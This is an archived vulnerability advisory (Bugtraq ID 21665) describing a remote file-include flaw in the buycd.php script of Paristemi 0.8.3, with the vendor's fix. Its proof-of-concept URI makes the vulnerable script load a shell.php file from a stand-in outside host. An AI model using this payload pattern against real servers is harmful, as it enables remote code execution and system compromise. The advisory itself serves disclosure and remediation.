Paristemi BuyCD.PHP Remote File Include Vulnerability
BID:21665
Info
Paristemi BuyCD.PHP Remote File Include Vulnerability
| Bugtraq ID: | 21665 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 19 2006 12:00AM |
| Updated: | Dec 22 2006 12:03AM |
| Credit: | nuffsaid <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Paristemi Paristemi 0.8.3 |
| Not Vulnerable: |
Paristemi Paristemi 0.8.4 |
Discussion
Paristemi BuyCD.PHP Remote File Include Vulnerability
Paristemi is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.8.3 is vulnerable to this issue; other versions may also be affected.
Paristemi is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.8.3 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
Paristemi BuyCD.PHP Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/music/buycd.php?HTTP_DOCUMENT_ROOT=http://www.example2.com/shell.php?
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/music/buycd.php?HTTP_DOCUMENT_ROOT=http://www.example2.com/shell.php?
Solution / Fix
Paristemi BuyCD.PHP Remote File Include Vulnerability
Solution:
The vendor has released an update to address this issue. The vendor recommends deleting the '/music/buycd.php' file from the server.
Paristemi Paristemi 0.8.3
Solution:
The vendor has released an update to address this issue. The vendor recommends deleting the '/music/buycd.php' file from the server.
Paristemi Paristemi 0.8.3
-
Paristemi paristemi-0_8_4.zip
http://downloads.sourceforge.net/paristemi/paristemi-0_8_4.zip
References
Paristemi BuyCD.PHP Remote File Include Vulnerability
References:
References:
- Paristemi 0.8.4 - Preventative Measure For Vulnerability (Paristemi)
- Paristemi Home Page (Paristemi)